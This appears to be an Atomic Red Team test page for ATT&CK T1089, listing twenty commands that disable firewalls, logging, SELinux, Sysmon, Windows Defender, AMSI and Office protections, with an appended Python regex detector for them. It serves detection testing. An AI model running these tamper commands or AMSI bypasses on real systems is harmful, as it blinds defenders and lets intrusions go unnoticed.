T1089.md

File metadata and controls

605 lines (354 loc) · 14.6 KB

T1089 - Disabling Security Tools

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.

Atomic Tests


Atomic Test #1 - Disable iptables firewall

Disables the iptables firewall

Supported Platforms: Linux

Attack Commands: Run with sh!

# CentOS 6 uses SysV init; CentOS 7 uses systemd with firewalld instead of iptables
if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 6 ];
then
  service iptables stop
  chkconfig iptables off
  service ip6tables stop
  chkconfig ip6tables off
elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 7 ];
then
  systemctl stop firewalld
  systemctl disable firewalld
fi


Atomic Test #2 - Disable syslog

Disables syslog collection

Supported Platforms: Linux

Attack Commands: Run with sh!

# CentOS 6 uses SysV init; CentOS 7 uses systemd
if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 6 ];
then
  service rsyslog stop
  chkconfig rsyslog off
elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 7 ];
then
  systemctl stop rsyslog
  systemctl disable rsyslog
fi


Atomic Test #3 - Disable Cb Response

Disable the Cb Response service

Supported Platforms: Linux

Attack Commands: Run with sh!

# CentOS 6 uses SysV init; CentOS 7 uses systemd
if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 6 ];
then
  service cbdaemon stop
  chkconfig cbdaemon off
elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 7 ];
then
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi


Atomic Test #4 - Disable SELinux

Disables SELinux enforcement

Supported Platforms: Linux

Attack Commands: Run with sh!

setenforce 0


Atomic Test #5 - Disable Carbon Black Response

Disables Carbon Black Response

Supported Platforms: macOS

Attack Commands: Run with sh!

sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist


Atomic Test #6 - Disable LittleSnitch

Disables LittleSnitch

Supported Platforms: macOS

Attack Commands: Run with sh!

sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist


Atomic Test #7 - Disable OpenDNS Umbrella

Disables OpenDNS Umbrella

Supported Platforms: macOS

Attack Commands: Run with sh!

sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist


Atomic Test #8 - Unload Sysmon Filter Driver

Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.

Supported Platforms: Windows

Inputs:

Name: sysmon_driver
Description: The name of the Sysmon filter driver (this can change from the default)
Type: string
Default Value: SysmonDrv

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

fltmc.exe unload #{sysmon_driver}

Cleanup Commands:

sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon

Dependencies: Run with command_prompt!

Description: Sysmon filter must be loaded
Check Prereq Commands:
fltmc.exe filters | findstr #{sysmon_driver} 
Get Prereq Commands:
echo Automated installer not implemented yet, please install Sysmon manually


Atomic Test #9 - Disable Windows IIS HTTP Logging

Disables HTTP logging on a Windows IIS web server, as observed in use by Threat Group 3390 (Bronze Union). This action requires the HTTP logging configuration section in IIS to be unlocked.

Supported Platforms: Windows

Inputs:

Name: website_name
Description: The name of the website on a server
Type: string
Default Value: Default Web Site

Attack Commands: Run with powershell!

C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true

Cleanup Commands:

C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false


Atomic Test #10 - Uninstall Sysmon

Uninstall Sysinternals Sysmon for Defense Evasion

Supported Platforms: Windows

Inputs:

Name: sysmon_exe
Description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)
Type: Path
Default Value: PathToAtomicsFolder\T1089\bin\sysmon.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sysmon -u

Cleanup Commands:

sysmon -i -accepteula

Dependencies: Run with powershell!

Description: Sysmon executable must be available
Check Prereq Commands:
if(cmd /c where sysmon) {exit 0} else {exit 1} 
Get Prereq Commands:
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
Description: Sysmon must be installed
Check Prereq Commands:
if(cmd /c sc query sysmon) { exit 0} else { exit 1} 
Get Prereq Commands:
cmd /c sysmon -i -accepteula


Atomic Test #11 - AMSI Bypass - AMSI InitFailed

An easy way to bypass AMSI inspection is to patch the DLL in memory, setting the "amsiInitFailed" field to true. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

Supported Platforms: Windows

Attack Commands: Run with powershell!

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Cleanup Commands:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)


Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key

With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

Cleanup Commands:

New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"


Atomic Test #13 - Disable Arbitrary Security Windows Service

With administrative rights, an adversary can disable Windows Services related to security products.

Supported Platforms: Windows

Inputs:

Name: service_name
Description: The name of the service to stop
Type: String
Default Value: McAfeeDLPAgentService

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled

Cleanup Commands:

sc.exe config #{service_name} start= auto
net.exe start #{service_name}


Atomic Test #14 - Disable PowerShell Script Block Logging

An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.

Credit to Matt Graeber (@mattifestation) for the research.

Supported Platforms: Windows

Attack Commands: Run with powershell!

$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0

Cleanup Commands:

$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1


Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface

An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.

Credit to Matt Graeber (@mattifestation) for the research.

Supported Platforms: Windows

Attack Commands: Run with powershell!

[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)


Atomic Test #16 - Tamper with Windows Defender ATP PowerShell

Attempts to disable scheduled scanning and other parts of Windows Defender ATP.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1

Cleanup Commands:

Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0


Atomic Test #17 - Tamper with Windows Defender Command Prompt

Attempts to disable scheduled scanning and other parts of Windows Defender ATP.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend

Cleanup Commands:

sc start WinDefend
sc config WinDefend start=enabled


Atomic Test #18 - Tamper with Windows Defender Registry

Disable Windows Defender from starting after a reboot

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1

Cleanup Commands:

Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0


Atomic Test #19 - Disable Microsoft Office Security Features

The Gorgon Group may disable Office security features so that their code can run: https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: Windows

Attack Commands: Run with powershell!

New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"

Cleanup Commands:

Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"


Atomic Test #20 - Remove Windows Defender Definition Files

Removing definition files would cause ATP to not fire for antimalware checks. See the MpCmdRun.exe man page for info on all arguments. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
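As an added detection-side example (not part of the Atomic Red Team page or its test definitions): a small Python matcher that flags the process command lines the tests above (Tests #1 through #20) would produce, run over constructed sample process-creation events. Host names, user names, rule names and the event layout are assumptions.

```python
import re

# Constructed process-creation events in the shape of a Sysmon EID 1 / auditd EXECVE /
# EDR process record, one per line: host<TAB>user<TAB>command line. Not real telemetry.
SAMPLE_EVENTS = """\
web01\tAdmin\tfltmc.exe unload SysmonDrv
web01\tAdmin\tsc config WinDefend start=disabled
web01\tAdmin\tpowershell -c Set-MpPreference -DisableRealtimeMonitoring 1
web01\tAdmin\tpowershell -c [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
web01\tAdmin\tappcmd.exe set config "Default Web Site" /section:httplogging /dontLog:true
web01\tAdmin\t"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All
lnx02\troot\tsetenforce 0
lnx02\troot\tsystemctl disable rsyslog
mac03\troot\tlaunchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
lnx02\tdeploy\tsystemctl restart nginx
"""

# One rule per tampering action in the tests above; the Linux rule's lookahead lets the daemon name precede the verb.
RULES = {
    "sysmon_driver_unload": r"\bfltmc(?:\.exe)?\s+unload\b",
    "sysmon_uninstall": r"\bsysmon(?:64)?(?:\.exe)?\s+-u\b",
    "defender_service_disabled": r"\bsc(?:\.exe)?\s+config\s+WinDefend\s+start=\s*disabled\b",
    "security_service_stopped": r"\b(?:net|sc)(?:\.exe)?\s+stop\s+(?:WinDefend|Sysmon|McAfee\w*)\b",
    "defender_preference_tamper": r"Set-MpPreference\s+-Disable\w+\s+(?:1|\$true)\b",
    "defender_policy_registry": r"\bDisableAntiSpyware\b",
    "amsi_initfailed_patch": r"\bamsiInitFailed\b",
    "amsi_provider_key_removed": r"Remove-Item\b.*\\AMSI\\Providers\\",
    "scriptblock_logging_tamper": r"\bEnableScriptBlock(?:Invocation)?Logging\b",
    "iis_http_logging_disabled": r"/section:httplogging\b.*\s/dontLog:true\b",
    "defender_definitions_removed": r"MpCmdRun(?:\.exe)?\"?\s+-RemoveDefinitions\b",
    "office_protected_view_tamper": r"\b(?:VBAWarnings|Disable\w+InPV)\b",
    "selinux_set_permissive": r"\bsetenforce\s+0\b",
    "linux_logging_or_firewall_off": r"(?=.*\b(?:rsyslog|iptables|ip6tables|firewalld|cbdaemon)\b)"
                                     r"\b(?:systemctl\s+(?:stop|disable)|service\s+\S+\s+stop|chkconfig\s+\S+\s+off)\b",
    "macos_security_daemon_unloaded": r"\blaunchctl\s+unload\b.*(?:carbonblack|littlesnitch|opendns)",
}
COMPILED = {name: re.compile(p, re.IGNORECASE) for name, p in RULES.items()}


def classify(cmdline):
    """Names of every rule that fires on one command line (empty list means nothing matched)."""
    return [name for name, rx in COMPILED.items() if rx.search(cmdline)]


def scan(events):
    """Parse tab-separated events and emit one alert per rule hit, keeping host/user context."""
    alerts = []
    for line in events.splitlines():
        host, user, cmdline = line.split("\t", 2)
        for rule in classify(cmdline):
            alerts.append({"host": host, "user": user, "rule": rule, "cmdline": cmdline})
    return alerts
```

Command-line matching is only one signal; the registry and policy edits in Tests #12, #14, #18 and #19 are better caught with registry-change auditing, since they need not pass through a visible command line.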